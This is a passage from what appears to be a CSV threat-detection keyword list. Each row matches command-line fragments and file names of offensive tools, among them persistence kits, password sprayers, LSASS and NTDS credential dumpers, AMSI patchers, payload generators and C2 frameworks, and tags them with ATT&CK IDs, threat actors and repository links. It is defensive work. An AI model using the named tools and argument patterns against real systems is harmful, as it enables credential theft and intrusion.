T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","2512" "* panix.sh --generator*",".{0,1000}\spanix\.sh\s\-\-generator.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","2513" "* panix.sh 
--systemd*",".{0,1000}\spanix\.sh\s\-\-systemd.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","2514" "* papacat.bat",".{0,1000}\spapacat\.bat","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","2515" "* papacat.bat",".{0,1000}\spapacat\.bat","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","2516" "* papacat.ps1*",".{0,1000}\spapacat\.ps1.{0,1000}","offensive_tool_keyword","JustEvadeBro","JustEvadeBro 
a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","0","N/A","N/A","8","4","309","25","2024-08-21T23:10:08Z","2021-05-11T06:26:10Z","2517" "* papacat.ps1*",".{0,1000}\spapacat\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","2518" "* Parasite Invoke.exe*",".{0,1000}\sParasite\sInvoke\.exe.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","N/A","8","3","207","32","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z","2519" "* parrot main *",".{0,1000}\sparrot\smain\s.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. 
penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2520" "* parrot.run/*",".{0,1000}\sparrot\.run\/.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2521" "* parrot-backports *",".{0,1000}\sparrot\-backports\s.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2522" "* parrot-security *",".{0,1000}\sparrot\-security\s.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. 
penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2523" "* --passnotreq --domain * --user * --pass *",".{0,1000}\s\-\-passnotreq\s\-\-domain\s.{0,1000}\s\-\-user\s.{0,1000}\s\-\-pass\s.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","2524" "* PassSpray.ps1*",".{0,1000}\sPassSpray\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","2525" "* PassSpray.ps1*",".{0,1000}\sPassSpray\.ps1.{0,1000}","offensive_tool_keyword","PassSpray","Domain Password Spray","T1110.003 - T1078","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Leo4j/PassSpray","1","0","N/A","N/A","10","1","7","3","2025-02-20T10:07:43Z","2023-11-16T13:35:49Z","2526" "* passwd.py*",".{0,1000}\spasswd\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","#linux","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","2527" "* --password 
wordlists/*.txt*",".{0,1000}\s\-\-password\swordlists\/.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","2528" "* password.lst*",".{0,1000}\spassword\.lst.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","2529" "* password_cracker.py*",".{0,1000}\spassword_cracker\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","2530" "* -PasswordList *",".{0,1000}\s\-PasswordList\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-SMBAutoBrute.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","2531" "* --password-list *",".{0,1000}\s\-\-password\-list\s.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","2532" "* --password-not-required --kdcHost 
*cme*",".{0,1000}\s\-\-password\-not\-required\s\-\-kdcHost\s.{0,1000}cme.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2533" "* passwords was bruted*",".{0,1000}\spasswords\swas\sbruted.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","2534" "* --passwordsperdelay *",".{0,1000}\s\-\-passwordsperdelay\s.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","2535" "* -PasswordSpray *",".{0,1000}\s\-PasswordSpray\s.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","2536" "* passwordspray -d *",".{0,1000}\spasswordspray\s\-d\s.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","2537" "* --passwords-to-users *hash*",".{0,1000}\s\-\-passwords\-to\-users\s.{0,1000}hash.{0,1000}","offensive_tool_keyword","autoNTDS","autoNTDS is an automation script designed to simplify the process of dumping and cracking NTDS hashes using secretsdump.py and hashcat","T1003 - T1059 - T1021.002 - T1213","TA0006 - TA0008 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/hmaverickadams/autoNTDS","1","0","N/A","N/A","10","2","109","14","2023-10-31T22:03:58Z","2023-10-30T23:10:58Z","2538" "* pastehakk.sh*",".{0,1000}\spastehakk\.sh.{0,1000}","offensive_tool_keyword","pastehakk","perform clipboard poisoning or paste jacking attack","T1115","T0001 - T0002 - T0005","N/A","N/A","Phishing","https://github.com/3xploitGuy/pastehakk","1","0","#linux","N/A","7","1","56","10","2020-06-22T01:17:53Z","2020-06-17T19:32:24Z","2539" "* patch_amsi.exe*",".{0,1000}\spatch_amsi\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","2540" "* Patch_AMSI.py*",".{0,1000}\sPatch_AMSI\.py.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - 
TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","2541" "* Patch_AMSI.vba*",".{0,1000}\sPatch_AMSI\.vba.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","2542" "* patch_etw.exe*",".{0,1000}\spatch_etw\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","2543" "* path-mtu.nse*",".{0,1000}\spath\-mtu\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2544" "* -pathToBloodHoundGraph * -pathToOutputGoFetchPath * -pathToAdditionalPayload *",".{0,1000}\s\-pathToBloodHoundGraph\s.{0,1000}\s\-pathToOutputGoFetchPath\s.{0,1000}\s\s\-pathToAdditionalPayload\s.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","Dispossessor","Discovery","https://github.com/GoFetchAD/GoFetch","1","0","N/A","N/A","10","7","633","99","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z","2545" "* -PathToDMP *.dmp*",".{0,1000}\s\-PathToDMP\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. 
It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","0","N/A","N/A","N/A","2","117","14","2025-03-28T10:49:43Z","2021-12-11T15:24:44Z","2546" "* -PathToGraph *.json -PathToPayload *.exe*",".{0,1000}\s\-PathToGraph\s.{0,1000}\.json\s\-PathToPayload\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","Dispossessor","Discovery","https://github.com/GoFetchAD/GoFetch","1","0","N/A","N/A","10","7","633","99","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z","2547" "* -Payload * -method sysprep*",".{0,1000}\s\-Payload\s.{0,1000}\s\-method\ssysprep.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","2548" "* --payload * --output * --rawscfile * --smuggle *",".{0,1000}\s\-\-payload\s.{0,1000}\s\-\-output\s.{0,1000}\s\-\-rawscfile\s.{0,1000}\s\-\-smuggle\s.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource 
Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","2549" "* --payload * --platform windows*",".{0,1000}\s\-\-payload\s.{0,1000}\s\-\-platform\swindows.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","2550" "* --payload * --shellcode_path * --xorkey *",".{0,1000}\s\-\-payload\s.{0,1000}\s\-\-shellcode_path\s.{0,1000}\s\-\-xorkey\s.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","N/A","10","7","613","133","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z","2551" "* 
-payload *-Lhost *-Lport*",".{0,1000}\s\-payload\s.{0,1000}\-Lhost\s.{0,1000}\-Lport.{0,1000}","offensive_tool_keyword","empire","Empire scripts arguments. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","2552" "* payload add *",".{0,1000}\spayload\sadd\s.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 
- T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","2553" "* --payload CommonsCollections*",".{0,1000}\s\-\-payload\sCommonsCollections.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Resource Development","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z","2554" "* --payload x64/c/ipv6 *",".{0,1000}\s\-\-payload\sx64\/c\/ipv6\s.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","N/A","10","7","613","133","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z","2555" "* --payload_file * --payload_path*",".{0,1000}\s\-\-payload_file\s.{0,1000}\s\-\-payload_path.{0,1000}","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","Black Basta","Exploitation 
tool","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","0","N/A","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ","4","2","149","22","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z","2556" "* payload_placement.exe*",".{0,1000}\spayload_placement\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","2557" "* --payloadcookie *",".{0,1000}\s\-\-payloadcookie\s.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","0","N/A","N/A","10","10","482","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z","2558" "* --payload-file pwn.bat*",".{0,1000}\s\-\-payload\-file\spwn\.bat.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0004 - TA0003 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/cnotin/SplunkWhisperer2","1","0","N/A","N/A","9","10","250","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z","2559" "* -PayloadPath *",".{0,1000}\s\-PayloadPath\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK 